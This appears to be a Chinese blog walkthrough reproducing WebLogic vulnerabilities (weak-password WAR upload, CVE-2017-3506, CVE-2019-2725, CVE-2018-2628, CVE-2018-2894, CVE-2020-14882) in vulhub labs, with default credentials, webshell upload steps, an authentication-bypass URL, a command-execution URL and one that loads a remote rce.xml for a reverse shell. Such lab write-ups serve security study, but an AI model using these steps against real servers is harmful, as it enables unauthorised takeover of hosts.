常见中间件漏洞(二、WebLogin合集)

于 2024-08-06 22:57:40 发布
阅读量1.2k 收藏 22
点赞数 17
文章标签: 常见中间件漏洞 WebLogic 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76631050/article/details/140968130
版权

目录

二、WebLogic

Weblogic介绍

2.1 后台弱口令GetShell

漏洞描述

影响范围

环境搭建

漏洞复现

2.2 CVE-2017-3506

漏洞描述

影响版本

环境搭建

漏洞复现

2.3 CVE-2019-2725

漏洞描述

影响版本

环境搭建

漏洞复现

2.4 CVE-2018-2628

漏洞描述

漏洞影响

环境搭建

漏洞复现

2.5 CVE-2018-2894_

漏洞描述

漏洞版本

环境搭建

漏洞复现

2.6 CVE-2020-14882

漏洞描述

影响版本

环境搭建

漏洞复现

另外一种方式

二、WebLogic

Weblogic介绍

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001 WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

2.1 后台弱口令GetShell

漏洞描述

通过弱口令进入后台界面,上传部署war包,getshell

影响范围

全版本(前提后台存在弱口令)

环境搭建
cd vulhub/weblogic/weak_password

docker-compose up -d

漏洞复现

默认账号密码:weblogic/Oracle@123

weblogic常用弱口令:https://cirt.net/passwords?criteria=weblogic这里注意, 单个账号错误密码5次之后就会自动锁定。

  1. 登录后台后,点击部署,点击安装,点击上传文件,

2.上传war包,jsp木马压缩成zip,修改后缀为war,上传

3.然后一直点击下一步,直到完成

4.访问部署好的war,并且用工具连接

http://60.205.170.32:7001/test/1.jsp

2.2 CVE-2017-3506

XMLDecoder反序列化漏洞

漏洞描述

Weblogic的WLS Security组件对外提供了webserver服务,其中使用了XMLDecoder来解析用户输入的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执行。

影响版本

受影响版本:WebLogic 10.3.6.0,12.1.3.0,12.2.1.1,12.2.1.2。

环境搭建
cd vulhub/weblogic/weak_password

docker-compose up -d
漏洞复现

访问以下目录中的一种,有回显如下图可以判断wIs-wsat组件存在

/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

  1. 验证是否存在wls-wsat组件

http://60.205.170.32:7001/wls-wsat/CoordinatorPortType

2.在当前页面抓包之后,添加下面请求包,在标签之间分别写存放 jsp 的路径和要写入的123.jsp

3.访问URL

http://60.205.170.32:7001/bea_wls_internal/123.jsp

2.3 CVE-2019-2725

漏洞描述

wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。

影响版本

weblogic 10.x weblogic 12.1.3

环境搭建
cd vulhub/weblogic/weak_password

docker-compose up -d

漏洞复现

1.漏洞验证

http://47.99.98.0:7011/_async/AsyncResponseService

如果出现一下页面,则说明存在漏洞

  1. 在当前页面抓包,修改请求包,写入shell

3.哥斯拉连接

http://47.99.98.0:7011/bea_wls_internal/12121.jsp

2.4 CVE-2018-2628

WebLogic T3协议反序列化命令执行漏洞(CVE-2018-2628)

漏洞描述

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据,服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中并创建T3协议通信连接,将流量传输到Java虚拟机.T3协议在开放WebLogic控制台端口的应用上默认开启, 攻击者可以通过T3协议发送恶意的的反序列化数据,进行反序列化,实现对存在漏洞的weblogic组件的远程代码执行攻击。

漏洞影响

Oracle WebLogic Server10.3.6.0.0 Oracle WebLogic Server12.1.3.0.0 Oracle WebLogicServer12.2.1.2.0 Oracle WebLogic Server12.2.1.3.0

环境搭建
cd vulhub/weblogic/CVE-2018-2628

docker-compose up -d

漏洞复现

1.直接使用利用工具(Liqun工具箱)

2.哥斯拉连接

http://47.99.98.0:7012/_async/cmd.jsp

2.5 CVE-2018-2894_

WebLogic文件任意上传漏洞

漏洞描述

Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在"生产模式"下默认不开启,所以该漏洞有一定限制。

漏洞版本

weblogic 10.3.6.0

weblogic 12.1.3.0

weblogic 12.2.1.2

weblogic 12.2.1.3

环境搭建
cd vulhub/weblogic/CVE-2018-2894

docker-compose up -d

这里环境后台密码是随机得,获取密码:docker-compose logs | grep password

设置Web服务测试开启

http://47.99.98.0:7013/console/login/LoginForm.jsp

设置web服务测试开启:域结构->base-domain->高级->启动Web服务测试页

点击保存,进入 config.do 文件进行设置,将目录设置为 ws utc 应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要

http://47.99.98.0:7013/ws_utc/config.do

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

漏洞复现

1.点击安全,点击添加,上传一个jsp木马

2.右键审查元素,然后搜索16,找到对应时间戳

3.Webshell链接

http://47.99.98.0:7013/ws_utc/css/config/keystore/1722950569989_shell.jsp

时间戳_文件名.jsp

2.6 CVE-2020-14882

WebLogic远程代码执行漏洞

漏洞描述

CVE-2020-14882允许远程用户绕过管理员控制台组件中的身份验证CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机

影响版本

Oracle Weblogic Server 10.3.6.0

Oracle Weblogic Server 12.1.3.0

Oracle Weblogic Server 12.2.1.3

Oracle Weblogic Server 12.2.1.4

Oracle Weblogic Server 14.1.1.0

环境搭建
cd vulhub/weblogic/CVE-2020-14882

docker-compose up -d

漏洞复现

1.访问管理控制台

http://47.99.98.0:7014/console/login/LoginForm.jsp

使用以下url绕过登录认证

2.使用以下url绕过登录认证

http://47.99.98.0:7014/console/css/%252e%252e%252fconsole.portal

此时达到未授权得效果。还未能GetShel。可以利用第二个漏洞(CVE-2020-14883),这远程加载XML文件拿到Shell

3.首先访问以下 URL,以连接 2 个漏洞并执行以下命令

http://47.99.98.0:7014/console/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success');")

我们进入到docker中可以看到命令已经成功运行了

另外一种方式

1.制作一个恶意XML文件,将其提供到Weblogic可以访问得服务器上:

2.然后通过以下 URL,Weblogic 将加载此 XML 并执行其中的命令

http://47.99.98.0:7014/console/css/%252e%252e%252fconsole.portal?nfpb=true& pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://47.99.98.0/rce.xml")

成功接收到反弹的shell

Meet.meet
关注
  • 17
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Weblogic_Scan:一款Weblogic漏洞扫描工具,批量ip,多端口检测
05-26
:police_officer_light_skin_tone:‍ 使用方法&免责 usage: python3 weblogic_scan.py [ip.txt] [Thread_num] 1、批量检测weblogic漏洞工具,兼容Linux和Windows 2、自己可以自定义扫描端口,端口字典在 /Payload/default_data/dict_ports.py 3、所有请求全部通过socket模块进行,为了防止遗漏,web请求相关Payload模块都进行 http/https两种验证模式 4、结果存放在Output目录下 5、工具仅用于安全人员安全测试,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
WebLogin安装与配置
08-08
WebLogin安装与配置 weblogic8 安装 JBuilder配置 图形解析
weblogic漏洞利用工具-WeblogicTool
siu~
08-17 2653
WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)
探索WeblogicExploit-GUI:一款强大的WebLogic漏洞利用工具
最新发布
gitblog_00031的博客
04-14 1456
探索WeblogicExploit-GUI:一款强大的WebLogic漏洞利用工具 项目地址:https://gitcode.com/sp4zcmd/WeblogicExploit-GUI 在网络安全领域,能够及时发现和利用漏洞是至关重要的。今天,我们向大家推荐一个开源项目——WeblogicExploit-GUI,这是一个专为WebLogic服务器设计的图形化漏洞利用工具。它可以帮助安全研究人...
v1.1!最新版Weblogic漏洞利用工具
潇湘信安的博客
07-16 823
迫于目前现有的weblogic工具没怎么更新、payloay jdk适用版本等问题,所以基于superman18、sp4zcmd等项目,写一个weblogic工具,工具运行版本要求jdk 8,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)。
weblogic漏洞利用工具_CVE202014645 Weblogic远程代码执行漏洞分析
weixin_39797758的博客
12-12 2277
一. 说明本文将针对Weblogic CVE-2020-14645漏洞进行分析和复现,仅从技术角度进行研究与讨论,严禁用于非法用途,违者后果自负。PS:本攻略由群友飞翔的delacroix(305536130)及Z(997362569)供稿,本人审稿。漏洞描述WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,We...
BU Weblogin Nag卸妆「BU Weblogin Nag Remover」-crx插件
03-23
安装此扩展程序以允许您的浏览器保存BU WebLogin的登录名和密码。 如果您尝试在浏览器中保存您的登录名和...确保https://weblogin.bu.edu不在“从未保存”列表中。 记住安装此扩展后重新启动浏览器。 支持语言:English
UM weblogin「UM Weblogin」-crx插件
03-24
自动输入UM页面的登录信息并单击CTools / Canvas登录按钮。 轻松登录CTools / Canvas,尤其是在不会自动填写登录字段的浏览器上。 支持语言:English
UM Weblogin-crx插件
04-04
UM Weblogin-crx插件是一款专为方便用户登录UM(可能是University Management或某种特定网络服务的缩写)页面而设计的浏览器扩展程序。这款插件主要用于自动填充和提交登录信息,使得用户在访问UM的CTools和Canvas...
weblogin:模拟web登陆
05-03
weblogin 模拟web登陆 技术 语言:Java 开发环境:Eclipse 系统:Windows 简介 Java实现的各种模拟登陆,主要有: 百度 百度翻译 CSDN 人人 新浪微博 人人贷 北理邮箱 北理极速论坛 北理研会 北理研究生院 北理联盟 ...
Weblogic GetShll&CMD;漏洞检测利用工具.rar
08-20
渗透测试中使用,可以用于检测weblogic漏洞并执行CMD命令,获取服务器权限,本程序仅供检测和学习用途,请勿用于其他任何非法用途!
weblogic反序列化全版本漏洞利用工具
06-27
weblogic反序列化全版本漏洞利用工具,可执行命令
Weblogic全版本反序列化漏洞利用工具.jar
02-01
weblogic反序列化检测工具
weblogic漏洞检测集合工具
11-17
weblogic漏洞检测集合工具支持一检测多个weblogic漏洞weblogic漏洞检测集合工具支持一检测多个weblogic漏洞
weblogic漏洞利用工具_Oracle WebLogic多个安全漏洞提示
weixin_39949297的博客
12-12 354
1.漏洞公告2020年1月14日,Oracle官方发布了2020年1月安全更新公告,包含了其家族多个产品的安全漏洞公告。其中有两个Oracle WebLogic Server的高危漏洞,对应CVE编号:CVE-2020-2546和CVE-2020-2551,漏洞公告链接:https://www.oracle.com/security-alerts/cpujan2020.html2.影响范围CVE-...
探索WebLogic Unserialize Exploit:一款强大的安全漏洞利用工具
gitblog_00019的博客
03-29 824
探索WebLogic Unserialize Exploit:一款强大的安全漏洞利用工具 项目地址:https://gitcode.com/hanc00l/weblogic_unserialize_exploit 简介 在网络安全的世界中,了解和应对漏洞是至关重要的。Weblogic_unserialize_exploit 是一个由hanc00l开发的开源项目,专门针对Oracle WebLog...
中间件安全:Weblogic 反序列化漏洞.(使用工具可以利用多种类型漏洞
网络安全领域___专研者.
11-27 1880
WebLogic 是美国 Oracle 公司出品的一个 application server,确切的说是一个基于 JAVA EE 架构的中间件WebLogic 是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的 Java 应用服务器。将 Java 的动态功能和 Java Enterprise 标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
weblogin_token翻译
09-17
weblogin_token是一个由英文单词组成的短语。其中,"web"代表网络,"login"代表登录,"token"代表令牌。因此,weblogin_token可以理解为网页登录令牌。令牌是一种用于验证用户身份的信息,它可以用于在网络服务中进行安全的身份验证和授权操作。在网页登录过程中,用户通常需要提供用户名和密码进行身份验证,而weblogin_token则是生成的一种特殊的令牌。这个令牌可以在用户登录成功后返回给用户,用于标识用户身份并在用户访问其他受保护的页面时进行验证。通过使用令牌,可以增加系统的安全性,避免了将用户的真实密码传输到不同的页面中,同时提供了方便的登录体验。weblogin_token可以在多个网络服务中使用,用户可以使用同一个令牌在不同的网页中登录,而无需重复输入用户名和密码。总而言之,weblogin_token是一个用于在网页登录过程中进行身份验证和授权操作的令牌。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值